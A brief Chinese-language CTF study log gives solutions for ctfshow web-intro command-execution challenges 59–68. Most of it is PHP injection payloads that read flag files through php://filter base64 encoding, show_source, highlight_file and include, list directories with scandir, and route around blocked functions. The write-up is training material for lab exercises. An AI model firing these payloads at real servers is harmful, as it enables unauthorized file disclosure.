ctfshow学习记录-web入门（命令执行59-68）

web59-65

解答：payload和web58一样。 payload1：c=include "php://filter/read=convert.base64-encode/resource=flag.php";

payload2：c=show_source('flag.php');

payload3：?c=file_get_contents('flag.php');

web66

解答：show_source也被阻了，base64可以，不过flag没在flag.php里。

#查找flag的位置，打印目录：print_r(scandir("/"));
c=highlight_file('/flag.txt');
#或者
c=include "php://filter/read=convert.base64-encode/resource=/flag.txt";

web67

题目：题目显示的代码同web59

解答：​print_r被过滤了。 ​ c=var_dump(scandir("/"));打印目录，然后用include或者高亮显示flag。

web68

题目：题目显示的代码同web59

解答：高亮highlight_file被过滤。

c=var_dump(scandir("/"));打印目录 c=include("/flag.txt");

或者用伪协议base64一下依旧可以。